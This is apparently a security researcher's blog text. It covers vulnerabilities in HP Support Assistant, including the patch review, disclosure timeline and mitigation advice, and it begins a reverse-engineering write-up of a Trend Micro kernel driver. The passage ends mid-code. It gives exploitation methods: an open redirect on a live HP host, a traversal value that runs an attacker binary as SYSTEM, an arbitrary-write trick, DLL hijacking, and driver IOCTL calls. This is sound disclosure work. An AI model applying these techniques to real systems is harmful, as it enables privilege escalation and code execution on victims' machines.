If the action item base ActionType property is equal to "PrinterDriver", the method makes sure the downloaded file’s MD5 hash equals that specified in the CheckSum property or the one obtained from HP’s CDN server.

After the file has completed downloading, the final verification step is done. The VerifyDownloadSignature method will check if the downloaded file is signed. If the file is not signed and the shouldDelete argument is true, the method will delete the downloaded file and return that the download failed.

Exploitation: Local Privilege Escalation #4

Let’s say I wanted to abuse DownloadSoftPaq to download my file to anywhere in the system, how could I do this?

Let’s take things one at a time, starting with the first challenge: the download URL. The only real check done on this URL is making sure the host of the URL http://[this part]/something ENDS with .hp.com or .hpicorp.net. For this check, the method takes the safe approach of using C#’s URI class and grabbing the host from there instead of trying to parse it out itself. This means unless we can find a "zero day" in C#’s parsing of host names, we’ll need to approach the problem a different way.

Okay, so our download URL really does need to end with an HP domain. DNS Hijacking could be an option, but since we’re going after a Local Privilege Escalation bug, that would be pretty lame. How about this… C# automatically follows redirects, so what if we found an open redirect bug in any of the million HP websites? Time to use one of my "tricks" of getting a web bug primitive.

Sometimes I need a basic exploit primitive like an open redirect vulnerability or a cross-site scripting vulnerability, but I’m not really in the mood to pentest. What can I do? Let me introduce you to an attacker’s best friend: "OpenBugBounty"! OpenBugBounty is a site where random researchers can submit web bugs about any website. OpenBugBounty will take these reports and attempt to email several security addresses at the vulnerable domain to report the issue. After 90 days from the date of submission, these reports are made public.

So I need an open redirect primitive, how can I use OpenBugBounty to find one? Google it!

Nice, we got a few options, let’s look at the first one.

An unpatched bug, just what we wanted. We can test the open redirect vulnerability by going to a URL like https://ers.rssx.hp.com/ers/redirect?targetUrl=https://google.com and landing on Google, thanks TvM and HP negligence (it's been 5 months since I re-reported this open redirect bug and it's still unpatched)!

Back to the method, this open redirect bug is on the host ers.rssx.hp.com which does end in .hp.com making it a perfect candidate for an attack. We can redirect to our own web server where the file is stored to make the method download any file we want.

The next barrier is being able to place the file where we want. This is pretty simple, because HP didn’t do safe path string concatenation. We can just set the action item base ExecutableName property to a relative path such as ../../something, allowing us to easily control the download location.

We don’t have to worry about MD5 verification if we just pass something other than "PrinterDriver" for the ActionType property.

The final check is the verification of the downloaded file’s signature. Let’s quickly review the method.

If the file is not signed and the shouldDelete argument is true, the method will delete the downloaded file and return that the download failed.

The shouldDelete argument is the first argument passed to the VerifyDownloadSignature method. I didn’t want to spoil it in discovery, but this is hilarious: the first argument to VerifyDownloadSignature is always false. This means that even if the downloaded file fails signature verification, since shouldDelete is always false, the file won’t be deleted. I really don’t know how to explain this one… did an HP developer just have a brain fart? Whatever the reason, it made my life a whole lot easier.

At the end of the day, we can place any file anywhere we want in the context of a SYSTEM process allowing for escalation of privileges.

Discovery: Local Privilege Escalation #5

The next protected method we’ll be looking at is CreateInstantTask. For our purposes, this is a pretty simple function to review.

The method takes three arguments: the String parameter updatePath, which represents the path to the update binary; the name of the update; and the arguments to pass to the update binary.

The first verification step is checking the path of the update binary.

This verification method will first ensure that the update path is an absolute path that does not lead to a junction or reparse point. Good job on HP for checking this.

The next check is that the update path "starts with" a whitelisted base path. For my 64-bit machine, MainAppPath expands to C:\Program Files (x86)\Hewlett Packard\HP Support Framework and FrameworkPath expands to C:\Program Files (x86)\Hewlett Packard\HP Support Solutions.

What this check essentially means is that since our path has to be absolute AND must start with a path to HP’s Program Files directory, the update path must actually be inside their installation folder.

The final verification step is ensuring that the update path points to a binary signed by HP.

If all of these checks pass, the method creates a Task Scheduler task to be executed immediately by an Administrator. If any Administrator is logged on, the binary is immediately executed.

Exploitation: Local Privilege Escalation #5

A tricky one. Our update path must be something in HP’s folders, but what could that be? This stumped me for a while, but I got a spark of an idea while brainstorming.

We have the ability to start ANY program in HP’s installation folder with ANY arguments, interesting. What types of binaries does HP’s installation folders have? Are any of them interesting?

I found a few interesting binaries in the whitelisted directories such as Extract.exe and unzip.exe. On older versions, we could use unzip.exe, but a new update implements a signature check. Extract.exe didn’t even work when I tried to use it normally. I peeked at several binaries in dnSpy and I found an interesting one, HPSF_Utils.exe.

When the binary was started with the argument "encrypt" or "decrypt", a dedicated encryption/decryption method would be executed.

If we passed "encrypt" as the first argument, the method would take the second argument, read it in and encrypt it, then write it to the file specified at the third argument. If we passed "decrypt", it would do the same thing except read in an encrypted file and write the decrypted version to the third argument path.

If you haven’t caught on to why this is useful: we can abuse the decrypt functionality to write a file of our choosing anywhere on the system, easily allowing us to escalate privileges. Since this binary is in the whitelisted path, we can execute it and abuse the arbitrary write to gain Administrator.

Arbitrary File Deletion Vulnerabilities

Discovery: Arbitrary File Deletion

Let’s start with some arbitrary file deletion vulnerabilities. Although file deletion probably won’t lead to Local Privilege Escalation, I felt that it was serious enough to report because I could seriously mess up a victim’s machine by abusing HP’s software.

The protected method we’ll be looking at is LogSoftPaqResults. This method is very short for our purposes; all we need to read are the first few lines.

When the method is called, it will combine the temporary path C:\Windows\TEMP and the ExecutableName from the untrusted action item base using an unsafe string concatenation. If the file at this path exists AND it is not signed by HP, it will go ahead and delete it.

Exploitation: Arbitrary File Deletion #1

This is a pretty simple bug. Since HP uses unsafe string concatenation on path strings, we can just escape out of the C:\Windows\TEMP directory via relative path escapes (e.g. ../) to reach any file we want.
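
To illustrate how the escape resolves, here is a tiny C++17 snippet that normalizes the concatenated path the same way the filesystem ultimately would; the victim path is, of course, illustrative.

// Minimal sketch (C++17): the service effectively computes
// "C:\Windows\TEMP" + ExecutableName, so a relative escape in
// ExecutableName walks right out of the directory.
#include <filesystem>
#include <iostream>

int main()
{
    std::filesystem::path target =
        "C:\\Windows\\TEMP\\..\\..\\Users\\victim\\important.doc";

    // Prints "C:\Users\victim\important.doc" -- the file that gets deleted.
    std::cout << target.lexically_normal().string() << "\n";
}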

If that file exists and isn’t signed by HP, the method, which is running in the context of a SYSTEM process, will delete that file. This is pretty serious: imagine if I ran this on the entirety of your system32 folder. That would definitely not be good for your computer.

Exploitation: Arbitrary File Deletion #2

This bug was even simpler than the last one, so I decided not to create a dedicated discovery section. Let’s jump into the past and look at the protected method UncompressCabFile.

When the method starts, as we reviewed before, the following is checked:

  1. cabFilePath (path to the cabinet file to extract) exists.
  2. cabFilePath is signed by HP.
  3. Our token is "trusted" and the cabFilePath contains a few pre-defined paths.

If these conditions are not met, the method will delete the file specified by cabFilePath.

If we want to delete a file, all we need to do is specify pretty much any path in the cabFilePath argument and let the method delete it while running as the SYSTEM user.

Remote Code Execution Vulnerability

Discovery

For most of this report we’ve reviewed vulnerabilities inside the HP service. In this section, we’ll explore a different HP binary. The methods reviewed in "General Exploitation" will not apply to this bug.

When I was looking for attack surfaces for Remote Code Execution, one of the first things I checked was for registered URL Protocols. Although I could find these manually in regedit, I opted to use the tool URLProtocolView. This neat tool will allow us to easily enumerate the existing registered URL Protocols and what command line they execute.

Scrolling down to "hp" after sorting by name showed quite a few options.

The first one looked mildly interesting because the product name of the binary was "HP Download and Install Assistant", could this assist me in achieving Remote Code Execution? Let’s pop it open in dnSpy.

The first thing the program does is throw the passed command line arguments into its custom argument parser. Here are the arguments we can pass into this program:

  1. remotefile = The URL of a remote file to download.
  2. filetitle = The name of the file downloaded.
  3. source = The "launch point" or the source of the launch.
  4. caller = The calling process name.
  5. cc = The country used for localization.
  6. lc = The language used for localization.

After parsing out the arguments, the program starts creating a "download request". The method will read the download history to see if the file was already downloaded. If it wasn’t downloaded before, the method adds the download request into the download requests XML file.

After creating the request, the program will "process" the XML data from the history file. For every pending download request, the method will create a downloader.

During this creation is when the first integrity checks are done. The constructor for the downloader first extracts the filename specified in the remotefile argument. It parses the name out by finding the last index of the character / in the remotefile argument and then taking the substring starting from that index to the end of the string. For example, if we passed in https://example.com/test.txt for the remote file, the method would parse out test.txt.
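
The parsing logic boils down to a one-line substring operation; a C++ equivalent of what the constructor does might look like this:

// Minimal sketch (C++17) of the equivalent substring logic.
#include <iostream>
#include <string>

int main()
{
    std::string remoteFile = "https://example.com/test.txt";
    std::string fileName = remoteFile.substr(remoteFile.find_last_of('/') + 1);
    std::cout << fileName << "\n"; // prints "test.txt"
}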

If the file name contains a period, verification on the extension begins. First, the method parses the file extension by getting everything after the last period in the name. If the extension is exe, msi, msp, msu, or p2 then the download is marked as an installer. Otherwise, the extension must be one of 70 other whitelisted extensions. If the extension is not one of those, the download is cancelled.

After verifying the file extension, the complete file path is created.

First, if the lc argument is ar (Arabic), he (Hebrew), ru (Russian), zh (Chinese), ko (Korean), th (Thai), or ja (Japanese), your file name is just the name extracted from the URL. Otherwise, your file name is the filetitle argument combined with the file name from the URL. Finally, the method will replace any invalid characters present in Path.GetInvalidFileNameChars with a space.

This sanitized file name is then combined with the current user's download folder + HP Downloads.

The next relevant step is for the download to begin, this is where the second integrity check is. First, the remote file URL argument must begin with https. Next, a URI object is created for the remote file URL. The host of this URI must end with .hp.com or end with .hpicorp.net. Only if these checks are passed is the download started.

Once the download has finished, another check is done. Before the download is marked as downloaded, the program verifies the downloaded content. This is done by first checking if the download is an installer, which was set during the file name parsing stage. If the download is an installer then the method will verify the certificate of the downloaded file. If the file is not an installer, no check is done.

The first step of verifying the certificate of the file is to check that it matches the binary. The method does this by calling WinVerifyTrust on the binary. The method does not care if the certificate is revoked. The next check is extracting the subject of the certificate. This subject field must contain, in any casing, hewlett-packard, hewlett packard, or o=hp inc.

When the client presses the open or install button on the form, this same check is done again, and then the file is started using C#’s Process.Start. There are no arguments passed.

Exploitation

There are several ways to approach exploiting this program. In the next sections, I’ll be showing different attack variants and the pros/cons of each one. Let’s start by bypassing a check we need to get past for any variant: the URL check.

As we just reviewed, the remote URL passed must have a host that ends with .hp.com or .hpicorp.net. This is tricky because the verification method uses the safe and secure way of verifying the URL’s host by first using C#’s URI parser. Our host will really need to contain .hp.com or .hpicorp.net.

A previous vulnerability in this report had the same issue. If you haven't read that section, I would highly recommend it to understand where we got this magical open redirect vulnerability in one of HP's websites: https://ers.rssx.hp.com/ers/redirect?targetUrl=https://google.com.

Back to the verification method, this open redirect bug is on the host ers.rssx.hp.com which does end in .hp.com making it a perfect candidate for an attack. We can redirect to our own web server where we can host any file we want.

This sums up the "general" exploitation portion of the Remote Code Execution bugs. Let’s get into the individual ones.

Remote Code Execution Variant #1

The first way I would approach this is seeing what type of file we can have our victim download without the HP program thinking it’s an installer. Only if it’s an installer will the program verify its signature.

Looking at the whitelisted file extensions, we don’t have that much to work with, but we have some options. One whitelisted option is zip; this could work. An ideal attack scenario would be a website telling the victim they need a critical update, the downloader suddenly popping up with the HP logo, and the victim pressing open on the zip file and executing a binary inside it.

To have a valid remote file URL, we will need to abuse the open redirect bug. I put my bad file on my web server and just put the URL to the zip file at the end of the open redirect URL.

When the victim visits my malicious website, an iframe with the hpdia:// URL Protocol is loaded and the download begins.

This attack is somewhat lame because it requires two clicks to RCE, but I still think it’s more than a valid attack method since the HP downloader looks pretty legit.

Remote Code Execution Variant #2

My next approach is definitely more interesting than the last. In this method, we first make the program download a DLL file which is NOT an installer, then we install a signed HP binary that depends on this DLL.

Similar to our DLL Hijacking attack in the third Local Privilege Escalation vulnerability, we can use any signed binary which imports a DLL that doesn’t exist. By simply naming our malicious DLL to the missing DLL name, the executed signed program will end up loading our malicious DLL giving us Remote Code Execution.

Here’s the catch. We’re going to have to set the language of the downloader to Arabic, Hebrew, Russian, Chinese, Korean, Thai, or Japanese. The reason is that for DLL Hijacking, we need our malicious DLL’s name to exactly match that of the missing DLL.

If you recall the CreateLocalFilename method, the actual filename will have the filetitle argument in it if the language we pass in through arguments is not one of those languages. If we do pass in a language that’s one of the ones checked for in that method, the filename will be exactly the filename specified in the remote URL.

If your target victim is in a country where one of these languages is spoken commonly, this is in my opinion the best attack route. Otherwise, it may be a bit of an optimistic approach.

Whenever the victim presses any of the open or install all buttons, the signed binary will start and load our malicious DLL. If your victim is in an English-speaking country or only speaks English, this may be a little more difficult.

You could have the website present a critical update guide telling the visitor what button to press to update their system, but I am not sure whether a user is more likely to press a button in a foreign language or to open a file inside a zip they downloaded.

At the end of the day, this is a one-click attack method, and it would work phenomenally in a country that uses the mentioned languages. This variant can also be used after detecting the victim’s language and seeing if it’s one of the few languages this variant supports. You can see the victim’s language in HTTP headers or just navigator.language in JavaScript.

Remote Code Execution Variant #3

The last variant for achieving remote code execution is a bit optimistic about how many resources the attacker has, but I don’t think it’s a significant barrier for an APT.

To review, if the extension of the file we’re downloading is considered an installer (see installer extensions in discovery), our binary will be checked for HP’s signature. Let’s take a look at the signature check.

The method takes in a file name and first verifies that the file has a valid certificate. This means a certificate ripped from a legitimate HP binary won’t work because it won’t match the binary. The concerning part is the check for whether the certificate is an HP certificate.

To be considered an HP certificate, the subject of the certificate must contain in any case hewlett-packard, hewlett packard, or o=hp inc. This is a pretty inadequate check, especially that lower case conversion. Here are a few example companies I can form that would pass this check:

  1. [something]hewlett PackArd[something]
  2. HP Inc[something]

I could probably spend days making up company names. All an attacker needs to do is create an organization that contains any of those words and they can get a certificate for that company. Next thing you know, they can have a one click RCE for anyone that has the HP bloatware installed.
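
To illustrate just how weak the check is, here is a small C++ sketch of the lowercase "contains" logic as described; the company name is made up, but any certificate subject containing one of the needles would pass.

// Minimal sketch (C++17) of the case-insensitive "contains" check.
#include <algorithm>
#include <cctype>
#include <iostream>
#include <string>

static bool IsHpSubject(std::string subject)
{
    // Lowercase the whole subject, then look for any of the needles.
    std::transform(subject.begin(), subject.end(), subject.begin(),
                   [](unsigned char c) { return static_cast<char>(std::tolower(c)); });
    for (const char* needle : { "hewlett-packard", "hewlett packard", "o=hp inc" })
        if (subject.find(needle) != std::string::npos)
            return true;
    return false;
}

int main()
{
    // A certificate issued to this made-up lookalike passes the check.
    std::cout << IsHpSubject("CN=Totally Legit hewlett PackArd LLC") << "\n"; // 1
}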

Proof of Concept

Local Privilege Escalation Vulnerabilities

Remote Code Execution Vulnerabilities

"Remediation"

HP had their initial patch finished three months after I sent them the report of my findings. When I first heard they were aiming to patch 10 vulnerabilities in such a reasonable time-frame, I was impressed because it appeared like they were being a responsible organization who took security vulnerabilities seriously. This was in contrast to the performance I saw last year with my research into Remote Code Execution in Dell's bloatware where they took 6 months to deliver a patch for a single vulnerability, an absurd amount of time.

In the following section, I'll be going over the vulnerabilities HP did not patch or patched inadequately. Here is an overview of what was actually patched:

  1. Local Privilege Escalation #1 – Patched ✔️
  2. Local Privilege Escalation #2 – Unpatched ❌
  3. Local Privilege Escalation #3 – Unpatched ❌
  4. Local Privilege Escalation #4 – "Patched" 😕 (not really)
  5. Local Privilege Escalation #5 – Unpatched ❌
  6. Arbitrary File Deletion #1 – Patched ✔️
  7. Arbitrary File Deletion #2 – Patched ✔️
  8. Remote Code Execution Variant #1 – Patched ✔️
  9. Remote Code Execution Variant #2 – Patched ✔️
  10. Remote Code Execution Variant #3 – Patched ✔️

Re-Discovery

New Patch, New Vulnerability

The largest change observed is the transition from the hardcoded "C:\Windows\TEMP" temporary directory to relying on the action item base supplied by the client to specify the temporary directory.

I am not sure if HP PSIRT did not review the patch or if HP has a lack of code review in general, but this transition actually introduced a new vulnerability. Now, instead of having a trusted hardcoded string be the deciding factor for the temporary directory… HP relies on untrusted client data (the action item base).

As an attacker, my unprivileged process is what decides the value of the temporary directory used by the elevated agent, not the privileged service process, allowing for simple spoofing. This was one of the more shocking components of the patch. HP had not only left some vulnerabilities unpatched but in doing so ended up making some code worse than it was. This change mostly impacted the Local Privilege Escalation vulnerabilities.

Local Privilege Escalation #2

Looking over the new InstallSoftpaqsSilently method, the primary changes are:

  1. The untrusted ActionItemBase specifies the temporary directory.
  2. There is more insecure path concatenation (path1 + path2 versus C#’s Path.Combine).
  3. There is more verification on the path specified by the temporary directory and executable name (e.g. checking for relative path escapes, NTFS reparse points, rooted paths, etc).

The core problems that are persistent even after patching:

  1. The path that is executed by the method still utilizes unvalidated untrusted client input. Specifically, the method splits the item property SilentInstallString by double quote and utilizes values from that array for the name of the binary. This binary name is not validated besides a simple check to see if the file exists. No guarantees it isn’t an attacker’s binary.
  2. There is continued use of insecure coding practices involving paths. For example, HP consistently concatenates paths by using the string combination operator versus using a secure concatenation method such as Path.Combine.

In order to have a successful call to InstallSoftpaqsSilently, you must now meet these requirements:

  1. The file specified by the TempDirectory property + ExecutableName property must exist.
  2. The file specified by TempDirectory property + ExecutableName property must be signed by HP.
  3. The path specified by TempDirectory property + ExecutableName property must pass the VerifyHPPath requirements:
    a. The path cannot contain relative path escapes.
    b. The path must be a rooted path.
    c. The path must not be a junction point.
    d. The path must start with HP path.
  4. The SilentInstallString property must contain the SPName property + .exe.
  5. The directory name is the TempDirectory property + swsetup\ + the ExecutableName property with .exe stripped.
  6. The Executable Name is specified in the SilentInstallString property split by double quote. If the split has a size greater than 1, it will take the second element as EXE Name, else the first element.
  7. The Executable Name must not contain .exe or .msi, otherwise, the Directory Name + \ + the Executable Name must exist.
  8. The function executes the binary specified at Directory Name + \ + Executable Name.

The core point of attack is outlined in steps 6 and 7. We can control the Executable Name by formulating a malicious payload for the SilentInstallString item property that escapes from a legitimate directory passed in the TempDirectory property into an attacker-controlled directory.

For example, if we pass:

  1. C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\ for the TempDirectory property.
  2. HPSF.exe for the ExecutableName property.
  3. malware for the SPName property.
  4. "..\..\..\..\..\Malware\malware.exe (quote at beginning intentional) for the SilentInstallString property.

The service will execute the binary at C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\swsetup\HPSF\..\..\..\..\..\Malware\malware.exe which ends up resolving to C:\Malware\malware.exe thus executing the attacker controlled binary as SYSTEM.

Local Privilege Escalation #3

The primary changes for the new InstallSoftpaqsDirectly method are:

  1. The untrusted ActionItemBase specifies the temporary directory.
  2. Invalid binaries are no longer deleted.

The only thing we need to change in our proof of concept is to provide our own TempDirectory path. That’s… it.

Local Privilege Escalation #4

For the new DownloadSoftpaq method, the primary changes are:

  1. The download URL cannot have query parameters.

The core problems that are persistent even after patching:

  1. Insecure validation of the download URL.
  2. Insecure validation of the downloaded binary.
  3. Open Redirect bug on ers.rssx.hp.com.

First of all, HP still only does a basic check on the hostname to ensure it ends with a whitelisted host; however, this does not address the core issue that the check in itself is insecure.

Simply checking the hostname leaves the check exposed to Man-in-the-Middle attacks, other Open Redirect vulnerabilities, and virtual host based attacks (e.g. a subdomain that redirects to 127.0.0.1).

For an unknown reason, HP still does not delete the binary downloaded if it does not have an HP signature because HP passes the constant false for the parameter that indicates whether or not to delete a bad binary.

At the end of the day, this is still a patched vulnerability since at this time you can’t quite exploit it, but I wouldn’t be surprised to see this exploited in the future.

Local Privilege Escalation #5

This vulnerability was completely untouched. Not much more to say about it.

Timeline

Here is a timeline of HP's response:

10/05/2019 - Initial report of vulnerabilities sent to HP.
10/08/2019 - HP PSIRT acknowledges receipt and creates a case.
12/19/2019 - HP PSIRT pushes an update and claims to have "resolved the issues reported".
01/01/2020 - Updated report of unpatched vulnerabilities sent to HP.
01/06/2020 - HP PSIRT acknowledges receipt.
02/05/2020 - HP PSIRT schedules a new patch for the first week of March.
03/09/2020 - HP PSIRT pushes the scheduled patch to 03/21/2020 due to Novel Coronavirus complications.

Protecting your machine

If you're wondering what you need to do to ensure your HP machine is safe from these vulnerabilities, it is critical to ensure that the software is either up to date or removed. HP Support Assistant does not update automatically unless you explicitly opt in (HP claims otherwise).

It is important to note that because HP has not patched three local privilege escalation vulnerabilities, even if you have the latest version of the software, you are still vulnerable unless you completely remove the agent from your machine (Option 1).

Option 1: Uninstall

The best mitigation to protect against the attacks described in this article and future vulnerabilities is to remove the software entirely. This may not be an option for everyone, especially if you rely on the updating functionality the software provides; however, removing the software ensures that you're safe from any other vulnerabilities that may exist in the application.

For most Windows installations, you can use the "Add or remove programs" component of the Windows control panel to uninstall the service. There are two pieces of software to uninstall, one is called "HP Support Assistant" and the other is called "HP Support Solutions Framework".

Option 2: Update

The next best option is to update the agent to the latest version. The latest update fixes several of the vulnerabilities discussed, except for three local privilege escalation vulnerabilities.

There are two ways to update the application. The recommended method is opening "HP Support Assistant" from the Start menu, clicking "About" in the top right, and pressing "Check for latest version". Another method of updating is to install the latest version from HP's website here.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

18 May 2020 at 15:32

The opinions expressed in this publication are those of the authors. They do not reflect the opinions or views of my employer. All research was conducted independently.

For a recent project, I had to do research into the methods rootkits are detected with and the most effective measures to catch them. I asked the question: what are some existing solutions to rootkits, and how do they function? My search eventually landed me on the TrendMicro RootkitBuster, which describes itself as "A free tool that scans hidden files, registry entries, processes, drivers, and the master boot record (MBR) to identify and remove rootkits".

The features it boasted certainly caught my attention. They were claiming to detect several techniques rootkits use to burrow themselves into a machine, but how does it work under the hood and can we abuse it? I decided to find out by reverse engineering core components of the application itself, leading me down a rabbit hole of code that scarred me permanently, to say the least.

Discovery

Starting the adventure, launching the application resulted in a fancy warning by Process Hacker that a new driver had been installed.

Already off to a good start, we got a copy of Trend Micro's "common driver"; this was definitely something to look into. Besides this driver being installed, a friendly window opened prompting me to accept Trend Micro's user agreement.

I wasn't in the mood to sign away my soul to the devil just yet, especially since the terms included a clause stating "You agree not to attempt to reverse engineer, decompile, modify, translate, disassemble, discover the source code of, or create derivative works from...".

Thankfully, Trend Micro already deployed their software onto my machine before I accepted any terms. Funnily enough, when I tried to exit the process by right-clicking on the application and pressing "Close Window", it completely evaded the license agreement and went to the main screen of the scanner, even though I had selected the "I do not accept the terms of the license agreement" option. Thanks Trend Micro!

I noticed a quick command prompt flash when I started the application. It turns out this was the result of a 7-Zip Self Extracting binary which extracted the rest of the application components to %TEMP%\RootkitBuster.

Let's review the driver we'll be covering in this article.

  • The tmcomm driver, which was labeled as the "TrendMicro Common Module" and "Trend Micro Eyes". A quick look over the driver indicated that it accepted communication from privileged user-mode applications and performed common actions that are not specific to the Rootkit Remover itself. This driver is not only used in the Rootkit Buster, but is implemented throughout Trend Micro's product line.

In the following sections, we'll be deep diving into the tmcomm driver. We'll focus our research on finding different ways to abuse the driver's functionality, with the end goal being able to execute kernel code. I decided not to look into tmrkb.sys because, although I am sure it is vulnerable, it seems to only be used for the Rootkit Buster.

TrendMicro Common Module (tmcomm.sys)

Let's begin our adventure with the base driver that appears to be used not only for this Rootkit Remover utility, but several other Trend Micro products as well. As I stated in the previous section, a very brief look-over of the driver revealed that it does allow for communication from privileged user-mode applications.

One of the first actions the driver takes is to create a device to accept IOCTL communication from user-mode. The driver creates a device at the path \Device\TmComm and a symbolic link to the device at \DosDevices\TmComm (accessible via \\.\Global\TmComm). The driver entrypoint initializes a significant amount of classes and structure used throughout the driver, however, for our purposes, it is not necessary to cover each one.

I was happy to see that Trend Micro made the correct decision of restricting their device to the SYSTEM user and Administrators. This meant that even if we did find exploitable code, a significant portion of the industry would not consider it a vulnerability, because any communication would require at least Administrative privileges. For example, Microsoft themselves do not consider Administrator-to-Kernel to be a security boundary because of the significant amount of access Administrators already have. This does not mean, however, that exploitable code in Trend Micro's drivers won't be useful.
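
Opening the device is straightforward from an elevated process; a minimal Win32 C++ sketch:

// Minimal sketch (Win32 C++): opening the TmComm device from an elevated
// user-mode process via its symbolic link.
#include <windows.h>
#include <cstdio>

int main()
{
    HANDLE device = CreateFileW(L"\\\\.\\Global\\TmComm",
                                GENERIC_READ | GENERIC_WRITE,
                                FILE_SHARE_READ | FILE_SHARE_WRITE,
                                nullptr, OPEN_EXISTING, 0, nullptr);
    if (device == INVALID_HANDLE_VALUE)
    {
        printf("Failed to open TmComm device: %lu\n", GetLastError());
        return 1;
    }
    printf("Got a handle to the TmComm device.\n");
    CloseHandle(device);
    return 0;
}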

TrueApi

A large component of the driver is its "TrueApi" class which is instantiated during the driver's entrypoint. The class contains pointers to imported functions that get used throughout the driver. Here is a reversed structure:

struct TrueApi
{
	BYTE Initialized;
	PVOID ZwQuerySystemInformation;
	PVOID ZwCreateFile;
	PVOID unk1; // Initialized as NULL.
	PVOID ZwQueryDirectoryFile;
	PVOID ZwClose;
	PVOID ZwOpenDirectoryObjectWrapper;
	PVOID ZwQueryDirectoryObject;
	PVOID ZwDuplicateObject;
	PVOID unk2; // Initialized as NULL.
	PVOID ZwOpenKey;
	PVOID ZwEnumerateKey;
	PVOID ZwEnumerateValueKey;
	PVOID ZwCreateKey;
	PVOID ZwQueryValueKey;
	PVOID ZwQueryKey;
	PVOID ZwDeleteKey;
	PVOID ZwTerminateProcess;
	PVOID ZwOpenProcess;
	PVOID ZwSetValueKey;
	PVOID ZwDeleteValueKey;
	PVOID ZwCreateSection;
	PVOID ZwQueryInformationFile;
	PVOID ZwSetInformationFile;
	PVOID ZwMapViewOfSection;
	PVOID ZwUnmapViewOfSection;
	PVOID ZwReadFile;
	PVOID ZwWriteFile;
	PVOID ZwQuerySecurityObject;
	PVOID unk3; // Initialized as NULL.
	PVOID unk4; // Initialized as NULL.
	PVOID ZwSetSecurityObject;
};

Looking at the code, the TrueApi is primarily used as an alternative to calling the functions directly. My educated guess is that Trend Micro is caching these imported functions at initialization to evade delayed IAT hooks. Since the TrueApi is resolved by looking at the import table, however, this mechanism is useless against a rootkit that hooks the IAT on driver load.

XrayApi

Similar to the TrueApi, the XrayApi is another major class in the driver. This class is used to access several low-level devices and to interact directly with the filesystem. A major component of the XrayApi is its "config". Here is a partially reverse-engineered structure representing the config data:

struct XrayConfigData
{
	WORD Size;
	CHAR pad1[2];
	DWORD SystemBuildNumber;
	DWORD UnkOffset1;
	DWORD UnkOffset2;
	DWORD UnkOffset3;
	CHAR pad2[4];
	PVOID NotificationEntryIdentifier;
	PVOID NtoskrnlBase;
	PVOID IopRootDeviceNode;
	PVOID PpDevNodeLockTree;
	PVOID ExInitializeNPagedLookasideListInternal;
	PVOID ExDeleteNPagedLookasideList;
	CHAR unkpad3[16];
	PVOID KeAcquireInStackQueuedSpinLockAtDpcLevel;
	PVOID KeReleaseInStackQueuedSpinLockFromDpcLevel;
	...
};

The config data stores the locations of internal/undocumented variables in the Windows Kernel such as IopRootDeviceNode, PpDevNodeLockTree, ExInitializeNPagedLookasideListInternal, and ExDeleteNPagedLookasideList. My educated guess is that the purpose of this class is to access low-level devices directly rather than using documented methods, which could be hijacked.

IOCTL Requests

Before we get into what the driver allows us to do, we need to understand how IOCTL requests are handled.

In the primary dispatch function, the Trend Micro driver converts the data alongside an IRP_MJ_DEVICE_CONTROL request to a proprietary structure I call a TmIoctlRequest.

struct TmIoctlRequest
{
	DWORD InputSize;
	DWORD OutputSize;
	PVOID UserInputBuffer;
	PVOID UserOutputBuffer;
	PVOID Unused;
	DWORD_PTR* BytesWritten;
};

The way Trend Micro organized dispatching of IOCTL requests is by having several "dispatch tables". The "base dispatch table" simply contains an IOCTL Code and a corresponding "sub dispatch function". For example, when you send an IOCTL request with the code 0xDEADBEEF, it will compare each entry of this base dispatch table and pass along the data if there is a table entry that has the matching code. A base table entry can be represented by the structure below:

typedef NTSTATUS (__fastcall *DispatchFunction_t)(TmIoctlRequest *IoctlRequest);

struct BaseDispatchTableEntry
{
	DWORD_PTR IOCode;
	DispatchFunction_t DispatchFunction;
};

After the DispatchFunction is called, it typically verifies some of the provided data, ranging from basic nullptr checks to checking the sizes of the input and output buffers. These "sub dispatch functions" then do another lookup based on a code passed in the user input buffer to find the corresponding "sub table entry". A sub table entry can be represented by the structure below:

typedef NTSTATUS (__fastcall *OperationFunction_t)(PVOID InputBuffer, PVOID OutputBuffer);

struct SubDispatchTableEntry
{
	DWORD64 OperationCode;
	OperationFunction_t PrimaryRoutine;
	OperationFunction_t ValidatorRoutine;
};

Before calling the PrimaryRoutine, which actually performs the requested action, the sub dispatch function calls the ValidatorRoutine. This routine does "action-specific" validation on the input buffer, meaning that it performs checks on the data the PrimaryRoutine will be using. Only if the ValidatorRoutine returns successfully will the PrimaryRoutine be called.
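
Putting the pieces together, the flow of a sub dispatch function looks roughly like the sketch below. This is a reconstruction based on the reversed structures above; the table bounds are illustrative:

NTSTATUS SubDispatch(TmIoctlRequest *Request, SubDispatchTableEntry *Table, SIZE_T EntryCount)
{
	// The operation code lives at the base of the user input buffer.
	DWORD operationCode = *(DWORD*)Request->UserInputBuffer;

	for (SIZE_T i = 0; i < EntryCount; i++)
	{
		if (Table[i].OperationCode != operationCode)
			continue;

		// Action-specific validation happens first...
		NTSTATUS status = Table[i].ValidatorRoutine(Request->UserInputBuffer,
			Request->UserOutputBuffer);
		if (!NT_SUCCESS(status))
			return status;

		// ...and only then does the requested action execute.
		return Table[i].PrimaryRoutine(Request->UserInputBuffer,
			Request->UserOutputBuffer);
	}

	return STATUS_INVALID_PARAMETER;
}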

Now that we have a basic understanding of how IOCTL requests are handled, let's explore what they allow us to do. Referring back to the definition of the "base dispatch table", which stores "sub dispatch functions", let's explore each base table entry and figure out what each sub dispatch table allows us to do!

IoControlCode == 9000402Bh

Discovery

This first dispatch table appears to interact with the filesystem, but what does that actually mean? To start things off, the code for the "sub dispatch table" entry is obtained by dereferencing a DWORD at the start of the input buffer. This means that to specify which sub dispatch entry you'd like to execute, you simply set a DWORD at the base of the input buffer to that entry's OperationCode.
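
From user-mode, invoking one of these operations might look like the sketch below. The device name is an assumption on my part (a guess based on the driver's name), and the operation code 2713h comes from the table that follows:

#include <windows.h>

int main(void)
{
	// Assumed symbolic link name; treat as illustrative.
	HANDLE device = CreateFileW(L"\\\\.\\TmComm", GENERIC_READ | GENERIC_WRITE,
		0, NULL, OPEN_EXISTING, 0, NULL);
	if (device == INVALID_HANDLE_VALUE)
		return 1;

	BYTE input[0x100] = { 0 };
	BYTE output[0x100] = { 0 };
	DWORD bytesReturned = 0;

	// Select the sub dispatch entry by placing its OperationCode at the
	// base of the input buffer (2713h == IoControlCreateFile).
	*(DWORD*)input = 0x2713;
	// ...operation-specific parameters would follow in the input buffer...

	DeviceIoControl(device, 0x9000402B, input, sizeof(input),
		output, sizeof(output), &bytesReturned, NULL);

	CloseHandle(device);
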